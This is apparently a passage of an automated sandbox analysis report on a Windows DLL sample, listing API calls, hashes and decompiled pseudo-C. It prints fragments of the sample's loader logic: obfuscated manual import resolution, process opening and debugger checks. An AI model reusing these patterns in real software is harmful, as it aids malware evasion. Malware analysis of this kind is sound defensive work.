                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DDF1D66
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1452675757-0
                                                                                                                                                                                                                                                          • Opcode ID: dba9c001ebc22cc53e572c16e9509fbdc5b77db99f259e01cff94314948529ec
                                                                                                                                                                                                                                                          • Instruction ID: f67ca2c437cc9d25b0832fbaab3075d06012799495d37e9fa8532987814b0537
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dba9c001ebc22cc53e572c16e9509fbdc5b77db99f259e01cff94314948529ec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EE092713453116BE7023F295C88F6B6B6CDF923357030336F624D22D0DB548C0A89A6
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6DE41D07
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DE41D75
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D6C4: RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE41D66
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2560199156-0
                                                                                                                                                                                                                                                          • Opcode ID: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction ID: 5ba21e5573019dbdedcb8a1564be68c68804b1a21aee047c8901b2fafa0fa3d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f419980b0d57dab263cfb1bb07152273dce8c3778cd03d5837c90342662bd574
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4101ACE2E056557BAF2555F62E88D7F296DDEC3DD9326412CFA18E2240EF50CC1281B0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetConsoleCP.KERNELBASE(00000000,?,00000000,?,00000000), ref: 6DE34399
                                                                                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(00000000,00000008,00000005,00000000), ref: 6DE343A7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleCreateSemaphore
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3129514459-0
                                                                                                                                                                                                                                                          • Opcode ID: 805b3b7f5f4a6134b38a7b4dc22a582b8598b8eeca05059e2ae9bfeba36bd0bb
                                                                                                                                                                                                                                                          • Instruction ID: 4c8f8c409e7685f19cbe6a9cd1c467a921ae4e8cca475193a28f6cb9d952726b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 805b3b7f5f4a6134b38a7b4dc22a582b8598b8eeca05059e2ae9bfeba36bd0bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 006190729043318BDB94CF1AD85076536F2B74B324F1A4A3ED959D7380E7779A04DB80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6DE335B3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction ID: 1115afd1a7ed923e406f6e647771b745372071fa741e67ba74b00846fb492e03
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a078a42a687d0d38597212de1fb6c51f92280019bb8d77228cd409bea1cf183
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F7122719002748FCB54CF2EC490BB97BF6FB47220F25866AE494D7381D7399609DB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,6DE70094), ref: 6DE3D6F6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction ID: 9b203a202315def1d33e9704a9455b78d199e4f037fb1c0bb62c660e1ccade68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab57e7ab1071731321be4f92eefcb7bc2d25b8478c66e19dfe56a8bd015a8c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E0E52A24423A67EB1116668D01B7B769CEFC27A8F734150DD39B22C0CF20C843C6B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF146C() {
                                                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                                                          				long _t3;
                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                          				long _t5;
                                                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                                                          				intOrPtr _t8;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t8 =  *0x6ddf41b0;
                                                                                                                                                                                                                                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                          				 *0x6ddf41bc = _t1;
                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t3 = GetVersion();
                                                                                                                                                                                                                                                          				if(_t3 <= 5) {
                                                                                                                                                                                                                                                          					_t4 = 0x32;
                                                                                                                                                                                                                                                          					return _t4;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					 *0x6ddf41ac = _t3;
                                                                                                                                                                                                                                                          					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                          					 *0x6ddf41a8 = _t5;
                                                                                                                                                                                                                                                          					 *0x6ddf41b0 = _t8;
                                                                                                                                                                                                                                                          					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                          					 *0x6ddf41a4 = _t6;
                                                                                                                                                                                                                                                          					if(_t6 == 0) {
                                                                                                                                                                                                                                                          						 *0x6ddf41a4 =  *0x6ddf41a4 | 0xffffffff;
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                          0x6ddf146d
                                                                                                                                                                                                                                                          0x6ddf147b
                                                                                                                                                                                                                                                          0x6ddf1483
                                                                                                                                                                                                                                                          0x6ddf1488
                                                                                                                                                                                                                                                          0x6ddf14d2
                                                                                                                                                                                                                                                          0x6ddf14d2
                                                                                                                                                                                                                                                          0x6ddf148a
                                                                                                                                                                                                                                                          0x6ddf1492
                                                                                                                                                                                                                                                          0x6ddf14ce
                                                                                                                                                                                                                                                          0x6ddf14d0
                                                                                                                                                                                                                                                          0x6ddf1494
                                                                                                                                                                                                                                                          0x6ddf1494
                                                                                                                                                                                                                                                          0x6ddf1499
                                                                                                                                                                                                                                                          0x6ddf14a7
                                                                                                                                                                                                                                                          0x6ddf14ac
                                                                                                                                                                                                                                                          0x6ddf14b2
                                                                                                                                                                                                                                                          0x6ddf14ba
                                                                                                                                                                                                                                                          0x6ddf14bf
                                                                                                                                                                                                                                                          0x6ddf14c1
                                                                                                                                                                                                                                                          0x6ddf14c1
                                                                                                                                                                                                                                                          0x6ddf14cb
                                                                                                                                                                                                                                                          0x6ddf14cb

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDF17B8,751463F0,00000000), ref: 6DDF147B
                                                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 6DDF148A
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6DDF1499
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDF14B2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 845504543-0
                                                                                                                                                                                                                                                          • Opcode ID: 2e5d012600136ab88dfd0cc1f432846a9a55288a5a49af3e0d8a054687beabc7
                                                                                                                                                                                                                                                          • Instruction ID: 89e4be0d93353c99745d9452d29f6fd94fb1cce2d9793a767e99b8a4f8802c58
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e5d012600136ab88dfd0cc1f432846a9a55288a5a49af3e0d8a054687beabc7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F03A71685211EFFF50BF69BD09B953BB4F71AB11F12401AF119D91C5D7B040418F59
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6DE3A6E6
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6DE3A6F0
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(6DE36BE1,?,?,?,?,?,00000001), ref: 6DE3A6FD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 40a5af385ed4fd2a8586b948ba40946bc1e21834dafc35f2845ad5c2472b4eb5
                                                                                                                                                                                                                                                          • Instruction ID: 2a0ae4d19d4cadff20fd68bfa480dff477669d3f437e5bbcca9a280debb45f9f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40a5af385ed4fd2a8586b948ba40946bc1e21834dafc35f2845ad5c2472b4eb5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7431C67491122D9BCF21DF24D988B9CBBF8BF08314F6141DAE51CA6250EB709B85CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                                          			E6DDF1566(void* __ecx) {
                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                          				signed short _t7;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                          				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
                                                                                                                                                                                                                                                          				if(_t7 == 0) {
                                                                                                                                                                                                                                                          					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                                                                                                          					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                          0x6ddf156a
                                                                                                                                                                                                                                                          0x6ddf157b
                                                                                                                                                                                                                                                          0x6ddf1583
                                                                                                                                                                                                                                                          0x6ddf1585
                                                                                                                                                                                                                                                          0x6ddf1598
                                                                                                                                                                                                                                                          0x6ddf1598
                                                                                                                                                                                                                                                          0x6ddf15a2

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6DDF1C5E,?,6DDF1810,?,00000000,00000000,?,?,?,6DDF1810), ref: 6DDF157B
                                                                                                                                                                                                                                                          • GetSystemDefaultUILanguage.KERNEL32(?,?,6DDF1C5E,?,6DDF1810,?,00000000,00000000,?,?,?,6DDF1810), ref: 6DDF1585
                                                                                                                                                                                                                                                          • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6DDF1C5E,?,6DDF1810,?,00000000,00000000,?,?,?,6DDF1810), ref: 6DDF1598
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3724080410-0
                                                                                                                                                                                                                                                          • Opcode ID: 06940b8a462a77a20758a8e72a0f73f18b42b96c702fdbdd57732019c9f6477e
                                                                                                                                                                                                                                                          • Instruction ID: 4b2443c9833afe626fc14f6b99875cf91219eb4293c1a477cff22fc4539d9fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06940b8a462a77a20758a8e72a0f73f18b42b96c702fdbdd57732019c9f6477e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE04FA8640249F6EB10FBA19C06FBD72B8EB0070AF910085FB01E60C0D7B49A05A736
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,6DE3C28A,?,?,?,?,?,6DE43E50), ref: 6DE3C2AD
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,6DE3C28A,?,?,?,?,?,6DE43E50), ref: 6DE3C2B4
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 6DE3C2C6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: be083766f97b4bd7c9ea50c9cf049ba6f1e2f1bb24a019d71e0826bcd637a5ba
                                                                                                                                                                                                                                                          • Instruction ID: 31dcbe30d9ba2954b05e1ac0dbc4590991ec9ea82b0035f9eeb00c6ea916993f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be083766f97b4bd7c9ea50c9cf049ba6f1e2f1bb24a019d71e0826bcd637a5ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E04F31104518EFCF012B51CE08A583F79EB55355B124418FA099A620CF36D882CA80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                          • Instruction ID: 6701d7e7b629a85ceef80ae799839e577ae9991b009db909cb34c1d600e427af
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF14075E042299FDF14CFA8C9906AEB7B5FF88324F26826DD519B7344DB319A01CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF1F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                          				signed short _v24;
                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                                          				intOrPtr* _t49;
                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                          				signed short _t51;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                                          				CHAR* _t54;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                                          				signed int _t68;
                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                          				CHAR* _t71;
                                                                                                                                                                                                                                                          				signed short* _t73;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t69 = __edi;
                                                                                                                                                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                          				_t59 =  *0x6ddf41cc;
                                                                                                                                                                                                                                                          				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                                          				if(_t43 != 0) {
                                                                                                                                                                                                                                                          					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                                          					_v12 = _t45;
                                                                                                                                                                                                                                                          					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                          					if(_t46 != 0) {
                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                          							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                                          							_t47 = LoadLibraryA(_t71);
                                                                                                                                                                                                                                                          							_v28 = _t47;
                                                                                                                                                                                                                                                          							if(_t47 == 0) {
                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                          							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                          							_t49 = _v12;
                                                                                                                                                                                                                                                          							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                                          							_t50 =  *_t49;
                                                                                                                                                                                                                                                          							if(_t50 != 0) {
                                                                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                                                                          								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                                          								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                          									_t51 =  *_t73;
                                                                                                                                                                                                                                                          									if(_t51 == 0) {
                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                                                                                          										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                                          										if(_t51 < _t69) {
                                                                                                                                                                                                                                                          											L12:
                                                                                                                                                                                                                                                          											_t21 =  &_v8;
                                                                                                                                                                                                                                                          											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                          											__eflags =  *_t21;
                                                                                                                                                                                                                                                          											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                          											_t65 = _a4;
                                                                                                                                                                                                                                                          											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                                          											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                                          												goto L12;
                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                          												goto L11;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                                          										L11:
                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t53 = _v8;
                                                                                                                                                                                                                                                          									__eflags = _t53;
                                                                                                                                                                                                                                                          									if(_t53 == 0) {
                                                                                                                                                                                                                                                          										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										_t54 = _t53 + 2;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                                          									__eflags = _t55;
                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                          										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										_t68 = _v8;
                                                                                                                                                                                                                                                          										__eflags = _t68;
                                                                                                                                                                                                                                                          										if(_t68 != 0) {
                                                                                                                                                                                                                                                          											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          										 *_v16 = _t55;
                                                                                                                                                                                                                                                          										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                                          										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                                          										_t32 =  &_v16;
                                                                                                                                                                                                                                                          										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                                          										__eflags =  *_t32;
                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								_t50 = _t61;
                                                                                                                                                                                                                                                          								if(_t61 != 0) {
                                                                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                          							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                                          							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                                                                          							goto L27;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                                          						__eflags = _t60;
                                                                                                                                                                                                                                                          						_v20 = _t60;
                                                                                                                                                                                                                                                          						goto L26;
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				L27:
                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                          0x6ddf1f31
                                                                                                                                                                                                                                                          0x6ddf1f3a
                                                                                                                                                                                                                                                          0x6ddf1f3f
                                                                                                                                                                                                                                                          0x6ddf1f45
                                                                                                                                                                                                                                                          0x6ddf1f4e
                                                                                                                                                                                                                                                          0x6ddf1f54
                                                                                                                                                                                                                                                          0x6ddf1f56
                                                                                                                                                                                                                                                          0x6ddf1f59
                                                                                                                                                                                                                                                          0x6ddf1f5e
                                                                                                                                                                                                                                                          0x6ddf1f65
                                                                                                                                                                                                                                                          0x6ddf1f65
                                                                                                                                                                                                                                                          0x6ddf1f69
                                                                                                                                                                                                                                                          0x6ddf1f71
                                                                                                                                                                                                                                                          0x6ddf1f74
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1f7a
                                                                                                                                                                                                                                                          0x6ddf1f84
                                                                                                                                                                                                                                                          0x6ddf1f86
                                                                                                                                                                                                                                                          0x6ddf1f89
                                                                                                                                                                                                                                                          0x6ddf1f8c
                                                                                                                                                                                                                                                          0x6ddf1f90
                                                                                                                                                                                                                                                          0x6ddf1f98
                                                                                                                                                                                                                                                          0x6ddf1f9a
                                                                                                                                                                                                                                                          0x6ddf1f9d
                                                                                                                                                                                                                                                          0x6ddf2005
                                                                                                                                                                                                                                                          0x6ddf2005
                                                                                                                                                                                                                                                          0x6ddf2009
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1fa2
                                                                                                                                                                                                                                                          0x6ddf1fa8
                                                                                                                                                                                                                                                          0x6ddf1faa
                                                                                                                                                                                                                                                          0x6ddf1fbd
                                                                                                                                                                                                                                                          0x6ddf1fc0
                                                                                                                                                                                                                                                          0x6ddf1fc0
                                                                                                                                                                                                                                                          0x6ddf1fc0
                                                                                                                                                                                                                                                          0x6ddf1fc4
                                                                                                                                                                                                                                                          0x6ddf1fac
                                                                                                                                                                                                                                                          0x6ddf1fac
                                                                                                                                                                                                                                                          0x6ddf1fb4
                                                                                                                                                                                                                                                          0x6ddf1fb6
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1fb6
                                                                                                                                                                                                                                                          0x6ddf1fa4
                                                                                                                                                                                                                                                          0x6ddf1fa4
